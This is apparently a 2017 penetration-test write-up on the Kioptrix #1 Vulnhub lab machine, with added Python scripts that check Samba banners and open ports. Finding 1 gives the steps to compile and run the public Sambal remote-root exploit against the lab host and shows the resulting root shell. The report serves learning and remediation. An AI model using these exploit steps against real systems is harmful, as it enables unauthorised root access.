Quick Report — Kioptrix #1

sic arie
Jul 21, 2017 · 5 min read

Executive Summary

On July 19th I decided to assess the security posture of the first Kioptrix virtual machine from Vulnhub. The host was found to be running a significantly out-of-date operating system and software, and to have several misconfigurations that make this virtual machine extremely vulnerable to attack. It is recommended that this machine be decommissioned, and that a modern operating system with currently supported software suites be deployed to perform the same function this host performs.

Scope

The scope of this penetration test was limited to the Kioptrix virtual machine, which was segmented on a private network, isolated from both the internet and the local network, and run locally on the pentester’s laptop. Within this scope, the expectation was that the pentester would assess the machine from a remote perspective and not attempt hardware or boot-related attacks.

Methodology

In approaching this host, I first downloaded the Kioptrix #1 image from Vulnhub.com, unzipped it, and added it to the list of VMs visible to my virtualization software. I placed it on the same NAT segment as my attacking VM and powered both on. Initial reconnaissance was performed with the Nmap utility to determine the IP address of the new host, which ports were open, and whether each service could be identified from its banner. Once a service was identified, it was further enumerated with automated tooling: Enum4linux, Nikto, and Nmap NSE scripts were used to gather more information from the host about the configuration of each service.

Once access was achieved on the host, several shell commands were used to determine the running processes, open ports, installed software packages and versions, as well as the system configuration.

Findings

Finding 1 — Remote Code Execution in Samba 2.2.1a (Critical)

The Samba 2.2.1a installation on the host is vulnerable to the Sambal exploit, which targets Samba 2.2.x versions up to 2.2.8. Running the smbclient command reveals the Samba version in the Server= field, as demonstrated below.

root@kali:~/vulnhub# smbclient -L 192.168.233.136
WARNING: The "syslog" option is deprecated
Enter root's password:
Server does not support EXTENDED_SECURITY but 'client use spnego = yes' and 'client ntlmv2 auth = yes'
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
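As an added defender-side check (example code, not part of the original report), the following script parses the Server= field from the smbclient output above and flags any Samba version inside the 2.2.0 through 2.2.8 range the report describes. The banner string is the one quoted above; the range bounds, function names, and handling of patch-letter suffixes such as the "a" in 2.2.1a are the example's own assumptions.

```python
"""Flag a Samba banner that falls in the 2.2.0 through 2.2.8 range.

Added example, not part of the original report. It parses the
Server=[Samba x.y.z] field printed by ``smbclient -L`` and compares
the numeric version against the range the report identifies.
"""
import re

# Constructed sample: the banner line quoted in the report.
SAMPLE_BANNER = "Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]"

# Affected range as stated in the report (assumed inclusive at both ends).
VULN_MIN = (2, 2, 0)
VULN_MAX = (2, 2, 8)

_SERVER_RE = re.compile(r"Server=\[Samba\s+([0-9][0-9A-Za-z.]*)\]")


def parse_samba_version(banner: str):
    """Return a (major, minor, patch) tuple from the banner, or None."""
    m = _SERVER_RE.search(banner)
    if not m:
        return None
    parts = []
    for piece in m.group(1).split("."):
        # "1a" -> 1: a trailing letter is a patch-letter suffix and is
        # treated (assumption) as still belonging to that numeric release.
        digits = re.match(r"\d+", piece)
        if not digits:
            return None
        parts.append(int(digits.group()))
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def is_sambal_affected(version) -> bool:
    """True when the version sits inside the report's affected range."""
    return version is not None and VULN_MIN <= version <= VULN_MAX


def assess_banner(banner: str) -> str:
    """One-line assessment suitable for a findings table."""
    v = parse_samba_version(banner)
    if v is None:
        return "no Samba version found in banner"
    vs = ".".join(map(str, v))
    if is_sambal_affected(v):
        return f"Samba {vs}: inside the 2.2.0-2.2.8 range affected by the trans2open overflow (CRITICAL)"
    return f"Samba {vs}: outside the 2.2.0-2.2.8 range"


if __name__ == "__main__":
    print(assess_banner(SAMPLE_BANNER))
```

The same parser can be pointed at the banner lines collected from every SMB host in an inventory, so the check scales beyond the single machine in this report.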

The Sambal exploit targets Samba versions 2.2.0 through 2.2.8 and exploits a buffer overflow in call_trans2open.c in these versions, which allows the execution of arbitrary code. On Kali systems with ExploitDB installed, the exploit is located at /usr/share/exploitdb/platforms/linux/remote/10.c. On a 32-bit Kali host it can be compiled with the following command:

gcc -o sambal 10.c

The resulting binary is then run against the Kioptrix host, specifying a ‘target’ of 0 with the -b flag to brute-force Linux hosts. The command attaches to the host automatically and prints the output of the id command, showing that the resulting user is ‘root’.

root@kali:~/vulnhub# ./sambal -b 0 192.168.233.136
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)

It is recommended that a new analytics host be provisioned using a project currently under active support, and that the new host not expose superfluous services such as Samba.

Finding 2 — Unsupported OS (High)

Older operating systems that are no longer receiving updates run the risk of a significant vulnerability being discovered and not patched. This risk increases with the age of the operating system.

The Kioptrix 1 virtual machine is running a significantly old version of RedHat; however, the specific version could not be determined because the /etc/issue and uname data had been modified. Due to the significant age of this operating system, the severity of this finding has been increased.

If this host is still needed, it is recommended that Red Hat Enterprise Linux 7.3 be used with a subscription that provides access to Red Hat’s system and package updates. If this is cost-prohibitive, the CentOS 7.7 image should be used.

Finding 3 — Unsupported Software (Critical)

As with older operating systems, once a software company or team deprecates a software version it is rare that product and security updates continue for the deprecated versions. As attack and analysis methods progress, they can be applied to older software and new vulnerabilities can be discovered.

Beyond the core software, which aged along with the OS, several third-party packages were also significantly out of date. If this host is still needed, it is recommended that these software packages be updated to their supported equivalents.

Webalizer v2.01 — this is not an active project; the final release was 2.23-08 in 2014.
Multi Router Traffic Generator v2.9.6 — also not an active project, as the final release, 2.17.4, came out in January of 2012.

An open source project under active development that may be able to perform the functions of both of the above projects is Nagios.

Apache v1.3.20 — the current version at the time of writing is 2.4.27.
Samba v2.2.1a — the current version at the time of writing is 4.6.6.

Finding 6 — Additional or Unnecessary Software on Host (Critical)

When performing the enumeration on this host, the Nmap utility returned the following for service and version enumeration:

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open status 1 (RPC #100024)

The above output shows four separate services exposed on the host — SSH on port 22, Apache on ports 80 & 443, RPC on ports 111 & 1024, and Samba on port 139. As the purpose of this device is to aggregate site traffic information for analytics (an assumption made by the pentester based on the primary applications on the host), the exposure of the RPC and Samba ports is unnecessary and significantly weakens the security posture of the host, given the host’s purpose and the vulnerabilities in the exposed software.

I recommend disabling RPC and Samba on the analytics host, as well as ensuring that all accounts with SSH access conform to the principle of least privilege and have a complex password.
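To make the "unnecessary exposure" judgement above repeatable, here is an added example (not part of the original report) that parses the Nmap service table quoted in this finding and reports every open port not on an allowlist for the host's role. The allowlist (SSH plus HTTP/HTTPS for an analytics web host) encodes the pentester's assumption about the host's purpose; the function names and the row-matching regex are the example's own.

```python
"""Compare an Nmap -sV service table against the ports a host's role needs.

Added example, not part of the original report. Open ports outside the
allowlist are reported as unnecessary exposure, matching the reasoning
in Finding 6 (RPC on 111/1024 and Samba on 139 are not needed).
"""
import re

# Constructed sample: the Nmap service/version table quoted in the report.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open status 1 (RPC #100024)
"""

# Assumed allowlist for this host's role: SSH for administration and
# Apache on 80/443 to serve the analytics pages. Adjust per host role.
EXPECTED_PORTS = {("tcp", 22), ("tcp", 80), ("tcp", 443)}

# One Nmap table row: "<port>/<proto> <state> <service> <version...>".
_ROW_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap_table(text: str):
    """Return one dict per open-port row; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = _ROW_RE.match(line.strip())
        if not m:
            continue
        port, proto, state, service, version = m.groups()
        if state != "open":
            continue
        rows.append({"port": int(port), "proto": proto,
                     "service": service, "version": version.strip()})
    return rows


def unexpected_services(rows, expected=EXPECTED_PORTS):
    """Rows whose (proto, port) pair is not on the role allowlist."""
    return [r for r in rows if (r["proto"], r["port"]) not in expected]


def report(text: str, expected=EXPECTED_PORTS):
    """One human-readable line per unnecessary open service."""
    return [
        f"{r['port']}/{r['proto']} {r['service']} ({r['version']}): not required for this host's role"
        for r in unexpected_services(parse_nmap_table(text), expected)
    ]


if __name__ == "__main__":
    for line in report(NMAP_OUTPUT):
        print(line)
```

Run against the table in this finding, the script lists exactly the RPC and Samba ports; feeding it the post-remediation scan should produce an empty list, which makes the recommendation easy to verify.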
